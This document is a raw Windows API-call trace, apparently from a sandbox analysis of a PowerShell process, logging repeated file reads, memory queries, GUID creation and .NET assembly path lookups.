	[0120.944] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.944] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.944] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.944] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.944] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.945] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.945] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.946] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.946] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.946] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.947] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.948] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.948] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.948] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.948] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.948] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.948] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.950] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.950] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.950] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.950] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.951] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.952] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.952] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.952] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.952] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.952] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.952] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.953] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.953] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.953] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x5c8, lpOverlapped=0x0) returned 1
	[0120.953] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353e0d0, nNumberOfBytesToRead=0x238, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353e0d0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x0, lpOverlapped=0x0) returned 1
	[0120.953] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x0, lpOverlapped=0x0) returned 1
	[0120.953] CloseHandle (hObject=0x6ac) returned 1
	[0121.038] VirtualQuery (in: lpAddress=0xedd898c0, lpBuffer=0xd7edd8a780, dwLength=0x30 | out: lpBuffer=0xd7edd8a780*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.040] VirtualQuery (in: lpAddress=0xedd898c0, lpBuffer=0xd7edd8a780, dwLength=0x30 | out: lpBuffer=0xd7edd8a780*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.052] VirtualQuery (in: lpAddress=0xedd898c0, lpBuffer=0xd7edd8a780, dwLength=0x30 | out: lpBuffer=0xd7edd8a780*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.074] VirtualQuery (in: lpAddress=0xedd898c0, lpBuffer=0xd7edd8a780, dwLength=0x30 | out: lpBuffer=0xd7edd8a780*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.078] VirtualQuery (in: lpAddress=0xedd898d0, lpBuffer=0xd7edd8a790, dwLength=0x30 | out: lpBuffer=0xd7edd8a790*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.127] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55610
	[0121.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.132] VirtualQuery (in: lpAddress=0xedd898c0, lpBuffer=0xd7edd8a780, dwLength=0x30 | out: lpBuffer=0xd7edd8a780*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.144] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55610
	[0121.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.145] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55940
	[0121.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55940, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.146] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0121.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.147] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54510
	[0121.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.149] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dade08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dade08*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x3d2, lpOverlapped=0x0) returned 1
	[0121.149] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dade08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dade08*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.153] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcddbb82, Data2=0x4955, Data3=0x4dbc, Data4=([0]=0xbc, [1]=0x56, [2]=0x4f, [3]=0xe2, [4]=0x1d, [5]=0xe2, [6]=0x45, [7]=0x77))) returned 0x0
	[0121.223] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2e1862f0, Data2=0xbf1a, Data3=0x4362, Data4=([0]=0xad, [1]=0x6a, [2]=0xfb, [3]=0x3a, [4]=0x6c, [5]=0xd5, [6]=0xf7, [7]=0xdb))) returned 0x0
	[0121.225] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dc1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dc1540*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.226] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dc1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dc1540*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.226] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dc1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dc1540*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.226] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dc1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dc1540*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.227] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dc1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dc1540*, lpNumberOfBytesRead=0xd7edd8a8c8*=0xd6, lpOverlapped=0x0) returned 1
	[0121.227] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23dc1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23dc1540*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.227] CloseHandle (hObject=0x694) returned 1
	[0121.228] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6718b61b, Data2=0x2970, Data3=0x4159, Data4=([0]=0xa0, [1]=0xe1, [2]=0xe6, [3]=0x9d, [4]=0xb9, [5]=0xa6, [6]=0xaf, [7]=0xc7))) returned 0x0
	[0121.229] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4f231d72, Data2=0x752a, Data3=0x420e, Data4=([0]=0xb7, [1]=0xcd, [2]=0xb3, [3]=0xdc, [4]=0xb0, [5]=0x71, [6]=0xe0, [7]=0xc1))) returned 0x0
	[0121.230] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5b0f814b, Data2=0x6ff4, Data3=0x430a, Data4=([0]=0x96, [1]=0x92, [2]=0xe5, [3]=0xec, [4]=0x73, [5]=0x97, [6]=0x9, [7]=0x38))) returned 0x0
	[0121.230] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbc0c6747, Data2=0x77c, Data3=0x402f, Data4=([0]=0xa1, [1]=0x4d, [2]=0xca, [3]=0x15, [4]=0x31, [5]=0x9e, [6]=0x35, [7]=0x3a))) returned 0x0
	[0121.231] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x9f6483b5, Data2=0x730, Data3=0x42ef, Data4=([0]=0xac, [1]=0x2f, [2]=0x2a, [3]=0xd4, [4]=0x8c, [5]=0xc6, [6]=0x4, [7]=0xca))) returned 0x0
	[0121.231] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x859712c3, Data2=0xaab2, Data3=0x41c6, Data4=([0]=0x84, [1]=0x22, [2]=0x3f, [3]=0xd0, [4]=0x64, [5]=0x65, [6]=0x92, [7]=0x8e))) returned 0x0
	[0121.233] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23deeff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23deeff0*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.233] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23deeff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23deeff0*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.233] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23deeff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23deeff0*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x219, lpOverlapped=0x0) returned 1
	[0121.233] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23deeff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23deeff0*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.233] CloseHandle (hObject=0x694) returned 1
	[0121.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0121.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0121.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0121.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", lpFilePart=0x0) returned 0x4a
	[0121.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0121.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0121.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50
	[0121.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0121.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0121.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
